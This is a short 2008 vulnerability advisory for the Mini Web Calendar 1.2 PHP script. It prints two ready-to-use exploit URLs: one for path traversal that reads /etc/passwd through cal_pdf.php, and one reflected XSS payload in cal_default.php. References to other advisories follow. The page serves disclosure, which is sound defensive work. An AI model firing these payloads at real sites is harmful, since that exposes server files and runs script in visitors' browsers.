Mini Web Calendar 1.2 (File Disclosure/XSS) Multiple Vulnerabilities

2008.11.16
Credit: ahmadbady
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79

************************(XSS / FD Vulnerability)************** script:Mini Web Calendar, ver. 1.2 ************************************************************************************************************ download from:http://www.smolinari.com/srm/download/mwcal/mwcal.zip?PHPSESSID=84ivc1h7ohn8f9ra7cgn66fj94 ************************************************************************************************************ ...................................................................................... local file xpl: http://www.site.com/mwcal/php/cal_pdf.php?thefile=/etc/passwd xss xpl: http://www.site.com/mwcal/php/cal_default.php/>'><ScRiPt>alert(0)</ScRiPt> *************************************************** *************************************************** Author: ahmadbady from http://www.deltahacking.net my mail: kivi_hacker666@yahoo.com ***************************************************

References:

http://www.securityfocus.com/bid/32196
http://www.frsirt.com/english/advisories/2008/3077
http://secunia.com/advisories/32640
http://osvdb.org/49679


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top